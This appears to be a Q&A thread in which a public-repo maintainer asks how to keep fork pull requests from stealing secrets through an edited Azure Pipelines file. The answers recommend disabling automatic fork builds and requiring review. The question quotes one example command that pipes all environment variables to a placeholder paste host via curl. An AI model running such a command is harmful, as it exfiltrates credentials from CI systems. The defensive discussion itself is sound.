# Run security checks before rurnning Azure Pipeline CI on public PR

Tags: continuous-integration, azure-pipelines, github-api, devsecops

I have a public repo. Random GitHub users are free to create pull requests, and this is great.

My CI pipeline is described in a normal file in the repo called `pipelines.yml` (we use Azure pipelines).

Unfortunately this means that a random GitHub user is able to steal all my secret environment variables by creating a PR where they edit the `pipelines.yml` and add a bash script line with something like:

```
export | curl -XPOST 'http://pastebin-bla/xxxx'
```

Or run arbitrary code, in general. Right?

How can I verify that a malicious PR doesn't change at least *some* critical files?

Comment: OK, that's nice. Unfortunately though, we are not using GH Actions, but Azure pipelines. Another thing, even if I manage to protect env secrets , if they add lines to pipelines.yml, the arbitrary code execution issue still stands.

Comment: Yep, sorry - Azure Pipelines has the same protection, though: https://learn.microsoft.com/en-us/azure/devops/pipelines/security/repos?view=azure-devops#dont-provide-secrets-to-fork-builds, https://learn.microsoft.com/en-us/azure/devops/pipelines/security/repos?view=azure-devops#consider-manually-triggering-fork-builds. *"how can I verify that a malicious PR doesn't change at least some critical files?"* - review it!

Comment: OK  I suppose a malicious user can inject arbitrary code also in a unit test, so no point in me trying to build an ACL on what files can or cannot be committed... So I should change my question into: "how to require review before running CI" for PRs of non-collaborators?

Comment: Per the link above _"You can turn off automatic fork builds"_ - you can see in the screenshot under **Comments**.

Comment: Oh.. That's actually spot on.  Thanks @jonrsharpe

Answer (score 1):

> How can I verify that a malicious PR doesn't change at least some critical files?

I am afraid we could not limit the PR doesn't change at least some critical files.

As workaround, we could turn off automatic fork builds and instead use pull request comments as a way to manually building these contributions, which give you an opportunity to review the code before triggering a build.

You could check the document [Consider manually triggering fork builds](https://learn.microsoft.com/en-us/azure/devops/pipelines/security/repos?view=azure-devops#consider-manually-triggering-fork-builds) for some more details.

[image]

Comment: Thank you! I enabled this, now I need to find a way to test it.

Comment: @sscarduzio, Any update for this issue? Have you resolved this issue? If not, would you please let me know the latest information about this issue?

Comment: I'm having an issue: PR are not triggering the pipeline after confguring  to require a team member's comment before (for non-team members' PRs)
See conf: https://imgur.com/a/CJt8akw
See PR https://github.com/sscarduzio/elasticsearch-readonlyrest-plugin/pull/732
("sparingly" is a fake GH user I created)